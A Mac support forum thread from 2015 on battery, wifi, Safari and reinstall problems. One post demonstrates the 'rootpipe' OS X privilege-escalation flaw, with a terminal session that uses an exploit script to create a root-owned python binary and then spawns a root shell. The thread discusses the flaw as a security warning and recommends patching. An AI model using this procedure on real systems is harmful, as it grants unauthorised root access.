The OSX/Apple support thread

Author
Discussion

RobinBanks

17,540 posts

178 months

Monday 13th April 2015
quotequote all
If you're in Southampton, that's a bit far. I'm in the West Mids. Thanks for the offer though!
As far as I can see, the only ones available now are aftermarket, I just need to find a good one. Every time I hit the Apple button thing by the space bar when it's on battery it just turns off laugh

RobinBanks

17,540 posts

178 months

Monday 13th April 2015
quotequote all
Excellent!
No need for a replacement battery now because my normal laptop has unbricked itself smile

whoami

13,151 posts

239 months

Tuesday 14th April 2015
quotequote all
whoami said:
Does anyone have any new ideas on the well documented wifi issues after a MacBook has been in "sleep" mode?

I've tried pretty much everything I can think of but nothing has solved it.
And, for no apparent reason (just like the first time), it's started again.

Pain in the arris. rolleyes

Tonsko

6,299 posts

214 months

Tuesday 14th April 2015
quotequote all
So I heard about something called 'rootpipe' today.

https://truesecdev.wordpress.com/2015/04/09/hidden...

It is an Apple backdoor - it can be exploited to obtain root privileges. Apple are only fixing it in Yosemite. None of the older ones are being patched. I tried it (running ML) and it works perfectly.

Basically, what you do is run the python script provided, give it an existing binary and an output file; it takes the binary and makes it able to run as root. We tried it with /bin/sh - but it didn't work. We suspected that /bin/sh has security built in if you like - however, older shells like /bin/ksh will run as root. We also subverted the python binary - so anything that then runs with the 'rooted' executable, runs as root.

user@localhost:~/Documents/Security$ which python
/Library/Frameworks/Python.framework/Versions/2.7/bin/python
user@localhost:~/Documents/Security$ ./rootpipe.py /Library/Frameworks/Python.framework/Versions/2.7/bin/python /tmp/python
will write file /private/tmp/python
Done!
user@localhost:~/Documents/Security$ cd /tmp
user@localhost:/tmp$ ./python
Python 2.7.9 (v2.7.9:648dcafa7e5f, Dec 10 2014, 10:10:46)
[GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system('id')
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),401(com.apple.access_screensharing),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),33(_appstore),61(localaccounts),80(admin),98(_lpadmin),100(_lpoperator),204(_developer)
0
>>> import pty
>>> pty.spawn('/bin/bash')
root@localhost:/tmp$ id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),401(com.apple.access_screensharing),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),33(_appstore),61(localaccounts),80(admin),98(_lpadmin),100(_lpoperator),204(_developer)
root@localhost:/tmp$ exit
exit
>>> quit()
user@localhost:/tmp$


Frankly terrifying. The long and the short of it - to protect from this, upgrade to latest release of Yosemite! That's it. Nothing else.

Edited by Tonsko on Tuesday 14th April 19:18

All that jazz

7,632 posts

145 months

Tuesday 14th April 2015
quotequote all
Surely nothing to worry about because Macs don't get viruses, right? getmecoat

Tonsko

6,299 posts

214 months

Tuesday 14th April 2015
quotequote all
biggrin

PJ S

10,842 posts

226 months

Tuesday 14th April 2015
quotequote all
I'm being a tad lazy – sorry – but this Security update was waiting to be applied, dated 8th April.

https://support.apple.com/en-us/HT204659

I see some reference to what the link previous discusses, and similarly a link from the comments to an Apple Discussion thread.
Is this something different, or does it cover the issue that Apple were being "hands-off" on the previous OSes, back to Lion (OS X.7)?

Tonsko

6,299 posts

214 months

Tuesday 14th April 2015
quotequote all
Yeh, it seems as though that is the one. The particular vulnerability about gaining admin is the top issue in that update breakdown.

I think the reason they're refusing to update the older OS' is because it's too hard.

qube_TA

8,402 posts

244 months

Wednesday 15th April 2015
quotequote all
All that jazz said:
Surely nothing to worry about because Macs don't get viruses, right? getmecoat
It's true they don't really get viruses but they do suffer from exploits, trojans, root kits etc just like any other system but they're not virus' in the normal sense.

Given that OSX is free and Apple want you to run the current version it doesn't worry me too much their policy not to patch older versions it runs just fine on pretty much any Intel-based machine. If you're happy running a 7+ year old computer you're probably not that bothered about it being on-line much anyway.

However more of a concern I think is that they're not patching older versions of iOS which has the same problem so if you're running an iPhone 4 which is a much more recent device then it's now not secure.






jmorgan

36,010 posts

283 months

Wednesday 15th April 2015
quotequote all
I think the trojans etc. rely on the user to allow through an action to happen on a mac.

IanA2

2,762 posts

161 months

Wednesday 15th April 2015
quotequote all
qube_TA said:
All that jazz said:
Surely nothing to worry about because Macs don't get viruses, right? getmecoat
It's true they don't really get viruses but they do suffer from exploits, trojans, root kits etc just like any other system but they're not virus' in the normal sense.

Given that OSX is free and Apple want you to run the current version it doesn't worry me too much their policy not to patch older versions it runs just fine on pretty much any Intel-based machine. If you're happy running a 7+ year old computer you're probably not that bothered about it being on-line much anyway.

However more of a concern I think is that they're not patching older versions of iOS which has the same problem so if you're running an iPhone 4 which is a much more recent device then it's now not secure.
Interesting point. Forgive my ignorance, but does the lack of security with older iOS's pose a threat to other Macs on the same network?

jmorgan

36,010 posts

283 months

Wednesday 15th April 2015
quotequote all
What exactly does this new threat do (old, whatever)? Layman terms.

qube_TA

8,402 posts

244 months

Wednesday 15th April 2015
quotequote all
jmorgan said:
What exactly does this new threat do (old, whatever)? Layman terms.
A baddy could embed the code into a website, you visit said site and run the code via your browser. The baddy could then theoretically run a script as root (adminstrator) on your computer to do bad things.



jmorgan

36,010 posts

283 months

Thursday 16th April 2015
quotequote all
qube_TA said:
jmorgan said:
What exactly does this new threat do (old, whatever)? Layman terms.
A baddy could embed the code into a website, you visit said site and run the code via your browser. The baddy could then theoretically run a script as root (adminstrator) on your computer to do bad things.
Just browsing to the site or have to tell the site to run a vid for example? I have been reading a bit on this but the layman explanation was not in the ones I looked at. Picked up on using file vault.

qube_TA

8,402 posts

244 months

Thursday 16th April 2015
quotequote all
If you have JAVA enabled for example and run a script via your browser.

Or run some software with the script included.


neenaw

1,212 posts

188 months

Tuesday 28th April 2015
quotequote all
I seem to be having quite a few issues with my Macbook Pro recently with it freezing up and the spinning beachball coming up on the screen, especially when opening Safari.

I've been thinking about reinstalling OS X as I'm not sure what else to try to get the laptop performing properly again.

What's the best way to reinstall OS X? I've backed the machine up in Time Machine but I'm not really sure what to do next so any advice would be appreciated.

Tonsko

6,299 posts

214 months

Tuesday 28th April 2015
quotequote all
Have you tried another browser? I had this with safari, and never managed to get to the bottom of it. I installed Iron Browser until Safari got an update which was a good workaround.

https://www.srware.net/en/software_srware_iron.php

LordGrover

33,531 posts

211 months

Wednesday 29th April 2015
quotequote all
2011 27" iMac - knackered file system.

Get to login, accepts password(s) but then hangs. Grey diagonal no entry sign IYSWIM.

Unable to verify or fix system disk.
HDD checks out okay at Apple Store so just need to reinstall OS X.

Problem: Not seeing the wireless keyboard, pad or mouse so using standard PC wired keyboard and mouse but can't find combination to start in boot options mode, I think it would be holding option key on proper keyboard.
Windows key alone doesn't do it, tried Ctrl+Win, Alt+Win, Ctrl+Alt+Win and various combinations with shift key too but no luck.
Any tips please?

Tonsko

6,299 posts

214 months

Wednesday 29th April 2015
quotequote all
So, stackexchange suggests trying the alt key on it's own - but then it also goes onto say that it may make a difference as to which USB socket you plug the kb into! [On a mini tho, be interested to know if it works on an imac].

Holding down 'C' should make it start up from DVD though - is that what you were after?

LordGrover

33,531 posts

211 months

Wednesday 29th April 2015
quotequote all
Thanks. That appears to be correct but still failing to boot. DVD spins up but just grey apple logo. Arsebiscuits. scratchchin

Disk reads okay in PC...

This is turning into a right faff. grumpy